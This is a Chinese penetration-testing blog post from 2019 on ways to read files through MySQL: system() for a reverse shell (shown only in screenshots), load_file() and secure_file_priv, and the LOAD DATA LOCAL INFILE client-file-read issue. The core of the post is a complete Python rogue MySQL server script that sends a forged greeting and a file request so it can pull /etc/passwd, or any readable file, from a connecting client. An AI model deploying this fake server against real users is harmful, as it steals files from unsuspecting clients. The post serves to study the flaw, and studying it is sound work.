<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="渗透测试,">










<meta name="keywords" content="渗透测试">
<meta property="og:type" content="article">
<meta property="og:title" content="关于mysql几种读取文件及利用的方式">
<meta property="og:url" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/index.html">
<meta property="og:site_name" content="lockcy&#39;s cave">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/1.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/2.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/3.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/4.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/5.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/6.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/7.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/8.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/9.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/10.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/12.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/11.png">
<meta property="og:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/13.png">
<meta property="og:updated_time" content="2019-10-02T04:08:03.817Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="关于mysql几种读取文件及利用的方式">
<meta name="twitter:image" content="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/">





  <title>关于mysql几种读取文件及利用的方式 | lockcy's cave</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">lockcy's cave</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/01/关于mysql读取文件的几种利用方式/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ICCTW">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lockcy's cave">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">关于mysql几种读取文件及利用的方式</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-10-01T11:32:13+08:00">
                2019-10-01
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>

<p>1.system</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/1.png">

<p>可以反弹shell</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/2.png">
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/3.png">

<p>可以通过堆叠查询使用，比较适合phpmyadmin，如果直接在有漏洞的页面注入会产生不可预料的错误（以php为例，一般会使用mysqli_fetch_array取查询出的条目，需要符合条件的条目）</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/4.png">

<p>windows下system似乎没有作用</p>
<p>2.load_file()<br> 使用load_file()是要有条件的<br> 1.在mysql下读写文件secure_file_priv的值不为NULL，这在mysql突破secure_file_priv写shell文章里有写<br> 2.需要拥有所需文件的权限</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/5.png">
<p>然而在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL，即默认无法写入写出，需要修改secure_file_priv</p>
<p>3.load data infile</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/6.png">
<p>关于load data infile，存在一个伪造服务端任意读取客户端文件的问题，这里参考了很多网上大牛的资料，还原一下这个漏洞。<br>远程连接Mysql的过程具体如下：<br> 1.客户端发起tcp连接，服务器返回一个greeting，包含了服务器mysql版本等信息<br> <img src="/2019/10/01/关于mysql读取文件的几种利用方式/7.png"><br> 2.login request<br> <img src="/2019/10/01/关于mysql读取文件的几种利用方式/8.png"><br> 3.初始化查询<br> <img src="/2019/10/01/关于mysql读取文件的几种利用方式/9.png"><br> 4.要进行load data local infile,这里有个坑，即使set global local_infile = ‘ON’ 后还是报错，所以只能登录时加–enable-local-infile参数，插入成功<br>  <img src="/2019/10/01/关于mysql读取文件的几种利用方式/10.png"><br> 5.服务端返回一个TABULAR请求，请求客户端的/etc/passwd 文件<br> <img src="/2019/10/01/关于mysql读取文件的几种利用方式/12.png"><br> 6./etc/passwd 中的内容成功传到了服务端<br> <img src="/2019/10/01/关于mysql读取文件的几种利用方式/11.png"></p>
<p> 这里可以伪造一个服务端，当客户端连接完成时发送一个TABULAR请求来任意读取客户端中有权限的文件信息<br> 服务端的伪造脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">#https://www.cnblogs.com/apossin/p/10127496.html</span><br><span class="line">#coding=utf-8</span><br><span class="line">import socket</span><br><span class="line">import logging</span><br><span class="line">logging.basicConfig(level=logging.DEBUG)</span><br><span class="line"></span><br><span class="line">filename=&quot;/etc/passwd&quot;</span><br><span class="line">sv=socket.socket()</span><br><span class="line">sv.bind((&quot;&quot;,3306))</span><br><span class="line">sv.listen(5)</span><br><span class="line">conn,address=sv.accept()</span><br><span class="line">logging.info(&apos;Conn from: %r&apos;, address)</span><br><span class="line">conn.sendall(&quot;\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00&quot;)   #greeting包</span><br><span class="line">conn.recv(9999)</span><br><span class="line">logging.info(&quot;auth okay&quot;)</span><br><span class="line">conn.sendall(&quot;\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00&quot;)   #reponse ok包</span><br><span class="line">conn.recv(9999)</span><br><span class="line">logging.info(&quot;want file...&quot;)</span><br><span class="line">wantfile=chr(len(filename)+1)+&quot;\x00\x00\x01\xFB&quot;+filename   #长度+数据包序号（1）+读取文件名</span><br><span class="line">conn.sendall(wantfile)</span><br><span class="line">content=conn.recv(9999)</span><br><span class="line">logging.info(content)</span><br><span class="line">conn.close()</span><br></pre></td></tr></table></figure>

<p>读取成功</p>
<img src="/2019/10/01/关于mysql读取文件的几种利用方式/13.png">

<p>参考资料：<br><a href="https://github.com/allyshka/Rogue-MySql-Server/blob/master" target="_blank" rel="noopener">https://github.com/allyshka/Rogue-MySql-Server/blob/master</a><br><a href="https://lightless.me/archives/read-mysql-client-file.html" target="_blank" rel="noopener">https://lightless.me/archives/read-mysql-client-file.html</a><br><a href="https://www.cnblogs.com/apossin/p/10127496.html" target="_blank" rel="noopener">https://www.cnblogs.com/apossin/p/10127496.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/渗透测试/" rel="tag"># 渗透测试</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/28/mysql突破secure-file-priv写shell/" rel="next" title="mysql突破secure_file_priv写shell">
                <i class="fa fa-chevron-left"></i> mysql突破secure_file_priv写shell
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/06/buuctf-pwn做题记录/" rel="prev" title="buuctf pwn做题记录(ing)">
                buuctf pwn做题记录(ing) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ICCTW</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">34</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ICCTW</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv" < span>人</span>



        







        
      </span></div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>
</html>
